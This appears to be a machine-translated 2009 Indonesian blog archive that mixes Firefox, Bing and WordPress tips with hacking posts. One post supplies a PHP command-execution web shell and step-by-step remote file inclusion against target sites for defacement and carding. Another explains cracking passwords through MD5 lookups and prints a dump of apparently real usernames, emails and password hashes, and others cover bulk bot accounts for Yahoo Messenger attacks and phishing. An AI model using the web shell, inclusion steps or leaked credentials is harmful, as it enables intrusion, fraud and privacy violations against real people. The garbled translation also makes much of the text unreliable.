3. Mouse shortcuts: We all are aware of the Keyboard shortcuts. But have you ever tried Mouse Shortcuts. Sometimes you are already using your mouse and it is easier to use a mouse shortcut than to go back to the keyboard. Master these cool ones

* Middle click on link (opens in new tab)
* Shift-scroll down (previous page)
* Shift-scroll up (next page)
* Ctrl-scroll up (decrease text size)
* Ctrl-scroll down (increase text size)
* Middle click on a tab (closes tab)

4. Limit RAM usage: If Firefox takes up too much memory on your computer, you can limit the amount of RAM it is allowed to us. Go to about:config, filter “browser.cache” and select “browser.cache.disk.capacity”. It’s set to 50000, but you can lower it, depending on how much memory you have. Try 15000 if you have between 512MB and 1GB ram.

5. Reduce RAM usage further for when Firefox is minimized: This setting will move Firefox to your hard drive when you minimize it, taking up much less memory. And there is no noticeable difference in speed when you restore Firefox, so it’s definitely worth a go. Again, go to about:config, right-click anywhere and select New-> Boolean. Name it “config.trim_on_minimize” and set it to TRUE. You have to restart Firefox for these settings to take effect.

6. Move or remove the close tab button: Do you accidentally click on the close button of Firefox’s tabs? You can move them or remove them, again through about:config. Edit the preference for “browser.tabs.closeButtons”. Here are the meanings of each value:

0: Display a close button on the active tab only

1: (Default) Display close buttons on all tabs

2: Don’t display any close buttons

3: Display a single close button at the end of the tab bar (Firefox 1.x behavior)

7. Smart keywords: Smart keywords are an easy way to search specific websites directly from the Firefox Location bar. Instead of going to the targeted website, finding the search function, and executing the search, you can search the website using Firefox, while you are at any website.

For example, suppose you search The Internet Movie Database (IMDB) on a regular basis. You can define a smart keyword to enable searching IMDB through your browser. To search IMDB for information on William Shatner, you would enter the following in the Firefox Location bar: imdb William Shatner

To create a Smart Keyword you can follow the steps given in this Tutorial

8. Firefox Optimizer: Firefox Optimizers for Mozilla Firefox v1.x / 2.x / 3.x was developed for an easy and fast optimization of your browsing experience with Firefox. It is based on a collection of popular and well working optimization settings used and tested by the experts. You can download this software from here.

Hack a server using PHP Bugs Injection.

2009-12-14T20:41:00.000-08:00

Preparation:
1. - Hosting File (jg free Yg lot. Example: Geocities, Ripway, etc.)
2. - Kangen band's song for you damn action nemenin
Okay, copy and paste the following script
Code:

// CMD - To Execute Command on File Injection Bug (gif - jpg-txt)

if (isset ($ chdir)) @ chdir ($ chdir);

ob_start ();

system ( "$ cmd 1> / tmp / cmdtemp 2> &1; cat / tmp / cmdtemp; rm / tmp / cmdtemp");

$ output = ob_get_contents ();

ob_end_clean ();

if (! empty ($ output)) echo str_replace (">", ">", str_replace ("<", "<",

$ output));

?>

bean-rebuz-hackers.200u.com

Exclusif for Hackers community | www.Hacker.200u.com

Join us at Hackers.200u.com

If so, save with the name and format.jpg CMD. Then upload to hosting you. (Jg free Yg many, udh discussed above) When I upload, then I'll get a URL like the following:
http://www.geocities/kacangrebuz/cmd.jpg
After that search for targets (This requires a high level of patience)
After the meet, for example:
http://www.target.com/main.php?page=article
Well, you change its URL jd
. http://www.target.com/main.php?page=http://www.geocities/kacangrebuz/cmd.jpg&cmd =
Then they will be executed URL! example:
. http://www.target.com/main.php?page=http://www.geocities/kacangrebuz/cmd.jpg&cmd=ls-l
and his tough results ... browser will menampilakan all imaginable directory in UNIX server according to the command above (ls-l is the command to view the contents of its directory
permissions).
For Defacing or carding, you can mengexplore lbh far lg ...
Okay ... okay ... I love him keyword:
to deface = "index.html, index.php, index.htm"
for carding = "orderlog.txt, order.php"
All exist on the server, live how you find it: D
so ... Happy Hacking!

Other ways Hack Paypal, Facebook, Etc.

2009-12-14T20:28:00.000-08:00

want to hack Paypal Account, or search on Facebook Poker Chips?
If using Keylogger, guns may be long-lasting, because over time the guard cafe will know, want to use login Fake rarely hit, because they already bookmark facebook page.
Maybe it could gunain way Like These:
1.siapkan Coffee, While smoking
2. Go to the website to encrypt the MD5, for example http://www.md5encryption.com
3. Enter the password that is used by some about facebook users, say Bismillah, Indonesia, Jakarta, Semarang, etc.
4. I take the example search for accounts that use passwords Bismillah. I will encrypt the password into MD5 Bismillah so the result a8e52217c48d055fb98e2732c587d056
5. Use Google as a search with keywords a8e52217c48d055fb98e2732c587d056
Result ........ Wew, cool ..............
=======================================
: (S: 2: "ID"; s: 2: "15"; s: 10: "user_login"; s: 11: "suci2006tri"; s: 9: "user_pass"; s: 32: "cbadce38e78bbb5f69e70e8d30d6421c"; s: 10: "USER_EMAIL"; s: 21: "suci2006tri@yahoo.com"; s: 8: "user_url"; s: 7: "http://";) i: 13; a: 5: (s : 2: "ID"; s: 2: "16"; s: 10: "user_login"; s: 11: "ejaalfabeta"; s: 9: "user_pass"; s: 32: "5099cad5505d32f53d351292772f23a5"; s: 10 : "USER_EMAIL"; s: 21: "asah_pena@yahoo.co.id"; s: 8: "user_url"; s: 7: "http://";) i: 14; a: 5: (s: 2: "ID"; s: 2: "17"; s: 10: "user_login"; s: 9: "shadyhuda"; s: 9: "user_pass"; s: 32: "662906a82298148e463c55c03e9dd15e"; s: 10: "USER_EMAIL"; s: 20: "penasyahid@gmail.com"; s: 8: "user_url"; s: 36: "http://www.baityjannati.blogspot.com";) i: 15; a: 5 : (s: 2: "ID"; s: 2: "18"; s: 10: "user_login"; s: 5: "WaOne"; s: 9: "user_pass"; s: 32: "c3653e4408832e6611f37dcd90544de8"; s: 10: "USER_EMAIL"; s: 18: "WaOne_09@yahoo.com"; s: 8: "user_url"; s: 8: "http://-";) i: 16; a: 5: ( s: 2: "ID"; s: 2: "20"; s: 10: "user_login"; s: 15: "gadislilinkecil"; s: 9: "user_pass"; s: 32: "9abd53722e8e33d2c93e5d84d0545dea"; s: 10: "USER_EMAIL"; s: 25: "iniemaibaruku@yahoo.co.id"; s: 8: "user_url"; s: 7: "http://";) i: 17; a: 5: (s : 2: "ID"; s: 2: "22"; s: 10: "user_login"; s: 5: "Mary"; s: 9: "user_pass"; s: 32: "0c5d7c458d8aa95f78ee1cd6af30942a"; s: 10 : "USER_EMAIL"; s: 14: "marry@rock.com"; s: 8: "user_url"; s: 7: "http://";) i: 18; a: 5: (s: 2: "ID"; s: 2: "23"; s: 10: "user_login"; s: 11: "herupranoto"; s: 9: "user_pass"; s: 32: "e16fef44c04d17721f422a64a250dad5"; s: 10: "USER_EMAIL "; s: 20:" hr_pranoto@yahoo.com "; s: 8:" user_url "; s: 7:" http:// ";) i: 19; a: 5: ======
And much more in reply to explore, he he he ...
I just gave a tutorial, and is not responsible for the use of this tutorial if misused.
Tip: For you, Whoever you are. Do not use a standard password which may be known, use a combination of numbers or characters even special characters. Suppose Bismillah999 *&^%$

Tips to Avoid Hacking WordPress Blog Engine

2009-12-01T06:39:00.000-08:00

Not infrequently a webmaster or blogger was worried at the hack, especially with the more popular a website, the more often exposed and threatened hack. To avoid this danger, here are some tips to secure your wordpress installation from hack attacks.

Secure Database
The first suggestion that I recommend is to secure the database you website or blog. How, make frequent backups of the database and backup data regularly. You can do this through phpMyAdmin hosting account, or using plugins, like WP-Database Backup (http://wordpress.org/extend/plugins/wp-db-backup/). These plugins backup task becomes easier. You just need to log into WordPress admin panel, then click a few links. These plugins should be owned by every blogger.

Scan WordPress
After a plugin that protect a database website, the next step is to scan to make sure the WordPress installation not found a gap in security. This task can be done also by using a plugin called WP Security Scan (http://wordpress.org/extend/plugins/wp-security-scan/). With this plugin you can mengedintifikasi gap - if the security hole found in the blog. In addition we will be told how to fix it. WP Security Scan plugins will also be offered for tables renaming prefixes, password strength testing, remove the admin account and verify your blog directory to have good security.

Tree Intruders
Intruder in this sense is a combination of letters, numbers and so are trying to find the password. Even bias Python script used to try to find the password you WordPress blog.

It would be very easy for an intruder to find the password if you use a blog or a word that is predictable. Therefore, try to use the correct password - really strong, using a combination of lowercase letters, numbers and special characters. You're also biased using a password generator in the WP Security Scan to create a strong password.
While using the password is juat a good trick, another way that will provide efficient protection for your blog, by adding an Apache Login form to the WP-Admin directory. Ask Apache (WP Security Scan) plugin allows you to protect your wp-admin directory was the equivalent of the security authentication server level (htpasswd). This plugin allows you to disable hotlinking, or prevent direct access to the wp-content directory and wp-includes.

Observe Plugins
Not all plugins were good, some of them who are the eyes - the eyes to see that there are security gaps in your blog. For this reason, there is a need for you to hide the content directory / wp-content/plugins. The trick is to create an empty file named index.html, which is then uploaded to the directory wp-content/plugins

WordPress version Hide
If there is a security hole in certain versions of WP, a hacker only needs to show the source code of your blog on your browser and see if the version you are wearing a bias related to penetrate. With the left version of Meta, chances are you biased infiltrated blog. To prevent this, delete the line in header.php in the theme you use. Similarly, there is also a plugin that allows you to trick on the version of WordPress that you use.

Tips Dismantling Hidden Password

2009-12-01T06:36:00.000-08:00

If you frequently use a password that is hidden, usually appearing in the form of aasterik (*). To display the contents of the password behind the asterisk, then you can try Asterisk Key freeware software, either to display the passwords in desktop applications, like Microsoft Word, Excel, QuickBooks, Access, PDF and etc., are also on the website.

To try Asterisk Key:

Download program Asterisk Key (http://www.lostpassword.com/f/downloads/ariskkey/a riskkey.exe)
Find a website or run a program that would be hackers password
Click the words "Recover"
As an example below:
Asterisk Key has been found hidden passwords, ie password passwordku named application, and password in the web of secrets.

Display results as follows:

8 Easy Firefox Tweaks for Super Fast Web Browsing

2009-11-14T21:21:00.000-08:00

Fast loading web pages while surfing the Internet may have more to do with your web browser settings and preferences than your Internet connection speed.

Try these easy Firefox tweaks and you’ll see that you’re surfing the Internet from 3 to 30 times faster!

To get started, open your Firefox web browser. In the address/location bar type [about:config] and then press your Enter key. (NOTE: DON’T TYPE THE BRACKETS.)

Tweak #1:
In the Filter bar type [network.http.pipelining]. Then, double-click on this line under Preference Name in order to change the value from false to true.

Tweak #2:
In the Filter bar type [network.http.pipelining.maxrequests]. Then, double-click on this line under Preference Name and change the value from 4 to a higher number anywhere from 10 to 30. I set mine to 30.

Tweak #3:
In the Filter bar type [network.http.proxy.pipelining]. Then, double-click on this line under Preference Name in order to change the value from false to true.

Tweak #4:
In the Filter bar type [network.dns.disableIPv6]. Then, double-click on this line under Preference Name in order to change the value from false to true.

Tweak #5:
In the Filter bar type [plugin.expose_full_path]. Then, double-click on this line under Preference Name in order to change the value from false to true.

Tweak #6:
In the Filter bar type [network.protocol-handler.external.ms-help]. Now, you are going to create a new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer.

In the New Integer value box type in [nglayout.initialpaint.delay] and click OK. Then in the Enter Integer value box type [0] (that’s a zero) and click OK.

Tweak #7:
In the Filter bar again type [network.protocol-handler.external.ms-help]. Now, you are going to create another new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer. In the New Integer value box type in [content.notify.backoffcount] and click OK. Then in the Enter Integer value box type [5] and click OK.

Tweak #8:
In the Filter bar again type [network.protocol-handler.external.ms-help]. Now, you are going to create another new Preference Name with an Integer Value. To do this, right-click on this line under Preference Name and select New, then Integer. In the New Integer value box type in [ui.submenuDelay] and click OK. Then in the Enter Integer value box type [0] (that’s a zero) and click OK.

Now, close your web browser and restart it. You’ll see how much faster web pages are loading. I sure did.

Let me know if these tweaks increase your Internet browsing speed. Know of any other tweaks or tricks? Let me know and I’ll add them.

Bing Tips & Tricks

2009-11-14T20:29:00.000-08:00

Now that Bing is available for use outside Microsoft, here are some quick tips and tricks that will help you do more with Bing.com.
1. Use the full version of Bing
If you are using Bing outside North America, chances are that you seeing a localized version of Bing that may be missing some features. For instance, the Indian version of Bing.com doesn’t have search history and the image on the Bing home page here is not interactive as in the US version.
To explore the full version of Bing, go to this page and set English - US as your default region. You can now enjoy all the Bing features from anywhere.
2. Track Companies from the IE Favorites Bar
If you search for a company stock (e.g. GOOG or MSFT), Bing will automatically create aweb slice for that company which you may then add to IE 8 and track the performance directly from the favorites bar. You need Internet Explorer 8 to try this feature.

3. Watch Preview of Hulu Videos outside US
Hulu hosts some popular popular TV shows but the problem is that you can only watch these videos if your computer has US based IP address.
However, Bing lets you watch shot previews of Hulu video even outside US. Just search for any TV show episode on Bing Videos (see example) and hover the mouse over any of the video thumbnail to watch a short clip.
4. Save and Email search results
With Bing, you can save your search history on to a local folder inside Bing or to your Windows Skydrive account. Alternatively, you may send your search queries to a friend via email or publish them on your Facebook wall via Bing. You’ll need Silverlight to share queries in Bing

5. RSS Feeds of Search Results
Unlike Google or Yahoo, Bing offers RSS feeds for their web search results that you can subscribe to inside any feed reader. Your browser should be able to auto-detect the RSS feed of Bing pages or you can append &format=rss to any Bing search URL and convert it into a feed.
This RSS feature is not available for Image or Video search in Bing.
6. Find Pages That Link to MP3 Files or Documents
Bing (and Live Search) supports a unique "contains" search operator that lets you find web pages that contain links to particular file types.
For instance, a search like susan boyle contains:mp3 will show pages that are about the British singer and that also link to MP3 files. Replace mp3 with doc to search pages that contain links to Word Documents.

Know Attacks Man-in-the-Middle (MITM)

2009-11-02T22:42:00.000-08:00

There have been many articles that discuss techniques ilmuhacking attack man in the middle (mitm), but I never explained in detail about what it mitm attack. Mitm attack is a type of attack is very dangerous and can happen anywhere, whether on websites, cell phones, as well as in traditional communications tools like mail correspondence. Therefore I think there needs to be a special article discussing mitm attack and no matter where the technical implementation.

Not Just Sniffing

Perhaps many who thought the purpose of mitm attack is to extract confidential data communications, such as sniffing. Sniffing can be called passive sniffing attack because the attacker did not doany action other than monitoring the data passing. It is true with mitm attack, an attacker can find out what was discussed by the two parties are communicating. But actually the biggest strength of mitm not sniffingnya ability, but the ability to intercept and modify communications mitm attack that could be called the type of active attack.

The figure below is a scenario that can be done with the attack mitm attacker.

In the picture there looks like 4 attacks that can be done with the MITM. Here is an explanation of the types of attacks in scenarios like the picture above.

* Sniffing: Charlie knows all the conversations between Alice and Bob.
* Intercepting: Charlie intercept a message from Alice when Alice wants to close the conversation with "Bob I'm going to sleep, Bye!". In this way Bob thinks Alice is still communicate with him.
* Tampering: Charlie alter response from Bob to Alice bob Paypal account to charlie.
* Fabricating: Charlie asked a number of social security number to Bob, when this question was never asked by Alice.

Mitm this way you can imagine how much potential damage can be done Charlie to Alice and Bob.

The attack happened Process Man-in-the-Middle

In mitm attack, an attacker would be in the middle of communication between two parties. The whole conversation going on between them should be through the attacker was in the middle. Attacker freely conduct surveillance, interception, modification and even falsified communication as I described earlier.

Now let us look at the process of MITM in case of Alice communicates with Bob. Charlie as the attacker will try to be in the middle between Alice and Bob. Charlie managed in order to be in the middle, then Charlie should:

* Masquerading as Bob before Alice
* Masquerading as Alice in front of Bob

In mitm, Alice thought was talking with Bob, when he was talking to Charlie. So is Bob, he thought was talking to Alice, when in fact he was talking to Alice. So in order to become one in the middle of Charlie must be disguised in the two sides, not just on one side only.

Why Alice and Bob can be trapped and deceived by Charlie? That's because Alice and Bob did not do authentication before communication. Alice ensure authentication will speak with Bob original, not the fake Bob played by Charlie. So also with authentication, Bob will speak with the original Alice, not the fake Alice played by Charlie.

Importance of Authentication: Who Are You Speaking With?

Authentication is the process to prove the identity of a subject, to people or machines. The process of proving identity seeorang many ways, but they can be grouped into 3 categories:

* What you know: a PIN, password, public key-pair private
* What you have: a smart card, key, USB dongle
* What you are: fingerprint, retina

Authentication briefly answer the question "Who are you speaking with?". The question was very important to know before the two parties to communicate. If the two parties to communicate without prior authentication, then they can get stuck talking to the wrong person, the person pretending to be his interlocutor. If until this happens the consequences can be fatal, one of which is the mitm attack.

When two people who already knew each other talked to in person, it can not be both trapped and deceived speak with the wrong people. Authentication becomes very important when the two sides talked through remote communication media such as telephone or internet. In the long-distance communication, we can only hear our speaker, so it is very likely we are talking to the wrong person.

So how to prevent MITM attacks is to perform authentication before communication. Even though the authentication performed by one party only, it is enough to prevent mitm. Let's look back to the example Alice, Bob and Charlie, if the authentication is only done by Bob, while Alice does not. The absence of authentication Alice, so Charlie could masquerade as Alice in front of Bob, but Charlie can not masquerade as Bob in front of Alice. Charlie Why can not disguise a Bob? Because Alice will test the authenticity of Bob with authentication, so disguises fake Charlie as Bob and Alice would be exposed would not want to continue communication.

Understanding Denial of Service Attack

2009-11-02T22:08:00.000-08:00

In this article I will explain about the types of attacks that can be said there is no cure, ie denial of service or DoS. If the DoS attack was conducted in a gang and organized well, it will produce tremendous damage and can paralyze popular sites like twitter.com and metasploit.com.

What is DoS

Denial of service is a type of attack whose purpose is to prevent users who actually enjoy the services provided servers. Server as the name is a servant who must always be ready to serve user requests, which generally operate 24 hours without stopping. Examples are in charge of the web server serves web visitors to provide information in the form of html pages. In normal circumstances, visitors can request a resource from the web server to be displayed in the browser, but if the web server DoS attack so visitors can enjoy the web services server.

In general there are 2 ways to DoS attacks:

1. Lethal Server
2. Server busy
* No bug / vulnerability
* Why exploits a bug / vulnerability

Denial by Deadly Server: Kill Them!

You never have to use a pay phone or ATM but could not because the machine is attached paper with the message "Out of Service" or "Medium in the improvement". Public phones are the target of DoS attacks are common, everywhere we find a general phone damaged by such DoS attacks slammed down the phone, unplugged, the LCD broke and other actions.

The purpose of this attack is to cause the server to shutdown, reboot, crash, "not responding". So these attacks result in damage to the persistent nature means DoS condition will still occur even if the attacker has stopped attacking, the new server back to normal after di-restart/reboot.

How can this be done DoS attack? The attack was carried out to exploit the bug / vulnerability on the server. Keyword in the vulnerability of this type usually is "specially / carefully crafted packet / request", which means a specially designed package. Why is specially designed? Because the package contains a certain qualities that make the server process dies when that particular package.

Let us consider some examples of the resulting vulnerability to DoS attacks:

* Ping of Death (CA-1996-26)

This is the kind of bug that is very old. Practically no longer a system is vulnerable to the bug. This bug when diexploit will make the server crash, freeze or reboot. This attack is done by sending "specially crafted" packets in the form of oversized ICMP packet, the packet size above normal. When the server receives and processes packets that "weird" is, then the server will crash, freeze or reboot. This is an example of DoS attacks "one shot one kill" because it can damage the server with only one shot.
* MySQL query IF DoS (SA25188)

This bug will make mysql server to crash just by sending a special sql function containing IF () example: "SELECT id from example WHERE id IN (1, (SELECT IF (1 = 0,1,2 / 0 )))". It's also kind of attack a "one shot one kill".

* Cisco Global Site Selector DNS Request Denial of Service (SA33429)

This bug made DNS server by sending Cisco died several "specially crafted" request control packet in a particular order.

The three examples above would be sufficient to provide a description of how this type of DoS attack performed. At its core is the attacker take advantage of (read: mengexploit) bug that makes servers stop working and are usually done alone remotely by sending a specially crafted packet.

Denial by busied Server: Make Them As Busy As Possible!

At the time before Lebaran we often feel so hard to send sms, often even failed to send. Similarly, when going on a quiz show on TV, the number mengelpon to answer the quiz was so difficult. This happens because there are so many people who send sms during Lebaran and called at the time of the quiz, making telecommunication networks have become so busy that could not serve another user. The incident is similar to what happens when a server is a denial of service attack. Denial is happening in these events is not the kind of deadly DoS the server, but the type of DoS the server busy.

Type of DoS is temporary, the server will return to normal when the attacker stops sending requests to a busy server.

Denial of this type is divided again into 2 types based on the way to attack:

* Exploiting vulnerability: Attacking with malicious request / packet
* No vulnerability exploitation: Attacking with the normal request / packet

Creating server vulnerability mengexploitasi busy with more quickly than without mengeksploit vulnerability.

Make Server Busy by Exploiting Vulnerability

In this type of DoS attack, the attacker take advantage of a bug that makes servers using excessive resource (cpu, memory, disk space, etc.). Attacker will figure out how to make the server work extra hard (much harder than a normal request) to serve her request. Usually this type of DoS attack is not the form of attack "one shot one kill". The attack carried out by doing a lot of requests with each request to the server consume more resources than a normal request.

In simple math, if the attacker could cause the server to work for 10 seconds only to serve him (eg, normally 0.1 seconds), then the attacker can send a request to create a server 1.000x serve him for 10,000 seconds (2.7 hours more), so create another user can not enjoy the server service.

To better understand this type of DoS, let's look at the examples that can diexploit vulnerability to DoS attacks of this type:

* TCP SYN Flood Denial

This is a DoS attack that is very old. Attacker attacks by flooding the server with requests of malicious SYN packets with fake source IP address. SYN packet is a packet from the client that initiated the formation of TCP / IP, then the server will respond with a SYN-ACK, and is equipped with a SYN-ACK packet-ACK from the client, this process is referred to three three-way handshake.

The trick is to fake the source IP address in the SYN packet from the client. As a result the server will send a SYN-ACK (step 2) to the wrong ip address that the server will not get a reply SYN-ACK-ACK from the client. Yet for every client who tried to open a connection, the server will allocate resources such as memory and time to wait for an ACK from the client replies. In this way the attacker to spend resources to serve only server false requests from the attacker.
* Mod_deflate Apache DoS

Apache using mod_deflate to compress the files. When the visitor asked for a file, then Apache will use mod_deflate to compress them and then send it to the visitor. But if in the middle of the process of compression, TCP connection decided visitor, Apache still working compress the files to the actual visitor is not there (was disconnect). So bugnya is the cpu resource usage borosnya to compress the files to the client that no longer exists.

Attacker take advantage of this weakness by asking for a large file, then in a short time so decided to make server connections to work hard for the visitor mempatkan files that no longer exists. This request is repeated many times until the server is so busy and exhausted all the cpu resources.

Two examples above vulnerability is explained how this type of DoS attack performed. At its core is to send a lot of malicious request / package to the server consume more resources and more time for each request is.

Make Busy Without Exploiting Server Vulnerability

This is the kind of attacks that rely on the ability to send requests to normal as much as possible so that the server becomes busy. The difference this type of DoS DoS vulnerability that is mengexploit on the request. Request sent on this type of DoS is a normal request as the user, so the server does not consume excessive resources. While DoS vulnerability that relies on sending specially crafted malicious requests to make the server consume more resources to serve the malicious request.

Normal requests cause the server to consume only the resources in the amount of mediocre, will not affect the overall server. Normally required number of requests in a very much disturbed to make the server work. So for this attack to be effective, then the attack must be made a gang from many places, the more attackers the better the results. This attack is also called a distributed DoS (DDoS) because it is done from many locations distributed (spread).

DDoS attacks carried out by using zombies or robots. Zombies are computers that are controlled so that attackers can be controlled remotely. A set of zombie computers to form networks called bot-net. Attacker get a lot of zombies with a spreading virus or worm, which infected every computer you install into a computer program that will run the commands from the attacker.

Botnet DDoS Attack

Courtesy of: www.dos-attack.net

The picture above explains how the DDoS. Attacker gave orders to all forces to make HTTP requests to a website. If the attacker-controlled army is very large, then the web server will be swamped with requests that become too busy and can not be accessed by users who actually (real visitors).

This type of attack there is no cure because the attacker does not exploit any bug or vulnerability. If on the other types of DoS attacks can be prevented by patching or updating software, then this attack can not be stopped with the updates or patches.

Conclusion

Is a denial of service attacks that cause the server can not serve the real users. Here are the types of DoS attacks based on the way to attack:

* Turn off the server: one shot, one kill to your server crashes, hangs, reboot.
* Busy server: sending so many requests to make the server busy.
o Exploiting the bug: send a lot of specially crafted request. The number of requests is not as much of a busy server DoS with the normal request.
o Normal requests: send a lot of user requests as normal as usual. Required number of requests for more than a busy type of DoS exploit servers with bugs. Usually used in a distributed botnet.

Making ID Boot (Bot) Yahoo Messenger

2009-10-17T11:28:00.000-07:00

Just like a state or kingdom who want to advance the war, of course, you have to prepare ammunition and soldiers or soldiers who will fight on the field fighting. If you are a rebel or the mafia, you would have to prepare your subordinates and weapons to face your enemy or your opponent. In reply to opponents in the world serawan Yahoo Messenger, ID Boot (Bot) is absolutely necessary as a soldier or a bullet to attack the opponent. Boot software as a war machine needed ammunition to shoot your opponent. This ammunition is none other than the ID does not Boot (Bot). Boot normally load ID Boot (Bot) which was registered in the Yahoo Server to war activities. Thus you must make your first soldier to Om Yahoo registered as a land of war. Like war Barathayuda your soldiers must go into battle before he could fight against the approaching enemy. How do I register ID Boot (Bot) anda.1. You can make ID Boot (Bot) like when you make your chat ID. Thus, for 1 or 1 soldier you must register boots long enough to follow all sorts of procedures that must run. Enter a code, type the name, and so on. One note for you, do not make the chat ID everyday you become ID Boot (Bot) or you log into your Boot. This avoids the possibility of a ban from Yahoo Party. The term cool your ID got banned from yahoo so that your ID can not be used again. Repeat steps to make ID's to taste. The more the better. Boot can load the ID Boot (Bot) until 1000 ID, and some have up to 10,000. Well you must be exhausted to make ID Boot (Bot) if it reaches 1000. How much time do you spend in front of the computer connected to the virtual world just to make ID Boot (Bot) up to 1000 pieces. Capeek not. So to avoid this software was made specifically to make ID Boot (Bot).
2. Find Software ID Creator on the site or sites of anti boot boot. Having got it running on your computer and do not forget to check your Internet connection. By using ID Creator you only need to write the name ID Boot (Bot) and password only. And leave all that crap enrollment into battle Yahoo to the Creator ID. Usually ID Creator makes a boot to provide ID Boot Option (Bot) like this: boot1, boot2, boot3, and so on. Password in order to more easily reconcile it. However, using the ID Boot (Bot) is identical to one another and are distinguished only by the number of anti boot normally will recognize it and then put in the category immediately removed the boot and away. Usually ID Boot (Bot) like this is very noticeable when the login to the Chat Room. But the advantages of ID in this way is the ease of making.

Once you have finished making ID Boot (Bot) that do not forget to save the name ID Boot (Bot) you and paswordnya in Note Pad. Boot software requires ID Boot (Bot) and password when you load or boot melogin through note pad. Save and you name the file with your name at will. Usually still be given the name Bots. Display in Note Pad is like this:

Bot1: password
Bot2: password
Bot3: password
Etc. ..

For clarity I give ID Boot (Bot) I've ever used before:

manusia_laut :******
rumput_laut_merah :******
rumput_teki_menyakitkan :******
babi_gila_amuk :******
kepala_pecah_seribu :******
seribu_hantu :******
jangkrik_mati :******
celeng_mengamuk :******
srigala_lapar_mengamuk :******
nendang_perut :******
mulut_buaya :******
lidah_neraka :******
lahar_merapi_merah :******
terkaman_singa :******
neraka_durhaka :******
surga_panas :******
geraman_guntur :******
sujud_dusta :******
telinga_kentut :******
sembayang_terlaknat :******
gelisah_pencarian :******
guntur_meledak :******
gembira_tersenyum :******
etc. ...

****** Is the password for each of ID Boot (Bot), in my example above the password for each of ID Boot (Bot) different from each other. While gembira_tersenyum, guntur_meledak, etc. is ID Boot (Bot). To be more beautiful and has a certain aesthetic, change your nickname and perhiaslah boot with "membatiknya". See my other writing about batik ID. If you receive ID Boot (Bot) with the above names, can be sure it came from me. But you do not worry, I will not use it anymore. At best make only my regular chat aja kok. If more males pake ID recurrence normally. You can also use the most often used by Booter:

modaro_kowe_cah01: bootersejati
modaro_kowe_cah02: bootersejati
modaro_kowe_cah03: bootersejati
modaro_kowe_cah04: bootersejati
modaro_kowe_cah05: bootersejati
modaro_kowe_cah06: bootersejati
modaro_kowe_cah07: bootersejati
modaro_kowe_cah08: bootersejati
modaro_kowe_cah09: bootersejati
modaro_kowe_cah10: bootersejati
and so on ...

"Modaro_kowe_cah01" .. ff is ID Boot (Bot) while "bootersejati" is a password. Separator between ID Boot (Bot) and the password is also wearing a space or; or the other. Depending on the boot software. Uh, was just an example loch, do not try to diloginkan ym, entar sorry that you can not login.
Bots with examples like this the most easily recognized by the anti-boot.

Do not login with a lot ID Boot (Bot) if your connection is weak or lelet, can-can you disconnect yourself later. More and more bots are in the longer login you also prepare yourself for bot attack takes time to prepare ammunition. Adjust more or less the pengen Id at login with your Internet connection

This is just info. Please do not be misused.
Hopefully useful.

Cracking or ID or username Hacking Yahoo Messenger (Including Email): Just Introduction and how to overcome

2009-10-17T11:25:00.000-07:00

Here I will teach you about ways to cracking yahoo id or something. Here I will only give a general overview of the ways a person id theft or cracking or hacking ID yahoo messenger or yahoo email address as well as short tips, or events like this event.

Cracking yahoo ID can be done in various ways. The most often committed is by using some tools or some crack software tools. To conduct activities to crack this software required basic knowledge about the use of a proxy or your Internet connectivity. Proxy is used to loop or repeat the experiment each time because the crack is very, very risky to cracking without using a proxy or other safety devices. Knowledge of the use of a password is also required. And most importantly the necessary username. Cracking activity is also done well for several hundred ps or username. So the first thing needed by the cracker is: list username or id or email address on yahoo, password list, proxy list (there are also tools that do not require a proxy).

I mentioned above is a way of cracking yahoo id through a specific tool. While cracking id also be done by creating a fake website that requires someone to write your username or id and password and then id and password are sent to the cracker. This method is useful if the user is less thorough. To further make this work or get a list of id and password crackers usually given a warning email or can also send instant messages or PM message (usually spam) to the user yahoo messenger. Tool required is YM PM spammers or Yahoo e-mail bombing. Can also be done manually

Now after knowing these two ways (there are several other ways, but the most common and easiest way is with two way), I want to give some tips to avoid things like that.

First: remember yahoo messenger and yahoo mail is the tool or facility that is free or free so anyone can easily use it and the yahoo did not care if the email or YM id you get this sort of thing. To avoid cracking the first way you need to strengthen your password as often suggested. Such as using more than 8 characters. Do not use your name, your birth date, or use a password with a word that is often used or contained in the dictionary. Using a variety of characters both good numbers, upper and lower case and the other characters. Make no sound or can not read. (This avoids the presence of your password in password cracking their list.

Second. To avoid the second way you must be aware that if there is an email or private message that directs you to write your yahoo password. Whether it is in the form of private message windows (AM or IM) or in the form of pages of a site (webpage).

The fourth is to avoid lock id ym do not use your email for chat on yahoo messenger world.

Fifth. It would be better if you use a paid e-mail or have the reversibility (the ability through the service) is good. It could also be from your company email or your institution or service your own email. In this way, in case of cracking process and the cracker change your password (if lucky because they could destroy the contents of your mail), you can ask the admin or webmasternya to return or give back the email address on the crack. Yahoo party does not provide this to you. You want to complain to yahoo om, I'm sure will not respond and had to make a new account. Not dangerous. But this risk has a free e-mail.

So just sharing
Hopefully Helpful

Protect Your Blog From Plagiarize (Copy Paste)

2009-09-26T00:57:00.000-07:00

May be you will be angry if your articel shown in other blog unexpectedly, moreover it without inserting the resource. I'll show you how to protect your blog from theif. But this trcik is pointed for small thief because it unusefull for expert thief. With this trick, the thief will unable to select your articel and unable to right click in your blog. But if you don't care about plagiarize, you will don't need this trick. Ok lets begin.

Go to your blog setting then chose "Template --> Edit HTML". Find this code then replace with this code

Now your blog will be disable selecting and righ click, but the thief can still steal your articel by select "views --> page source" menu from their browser or by pressing "Ctrl + u", they can see your source code and can copy the articel from it. To deceive this, put your mouce cursor before this code then press "enter" button many times, may be about 100 times :D the save your editting . Now if they press "Ctrl + u" they will only see a litle codes, he..he.. :D

But remember this trick is only work for a fool thieves, for an expert thieves is unusable.
I don't use it into my blog because there are many script that have to be copied by readers.

How to hide "Navbar Blogger"

2009-09-26T00:48:00.000-07:00

Before erasing navbar blogger (Navigation Bar), it’s better if I inform that this method is one of the Blogger TOS violation. If you still want to erase it, you can use the script below:

/* CSS to hid navigation bar */

#navbar {
height:10px;
visibility:hidden;
display:none;
}

How to do:
In the Edit HTML page, put the code above under the code

Port Scanning

2009-09-13T07:58:00.000-07:00

Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.

* A potential target computer runs many ’services’ that listen at ‘well-known’ ‘ports’.
* By scanning which ports are available on the
victim, the hacker finds potential vulnerabilities that can be exploited.
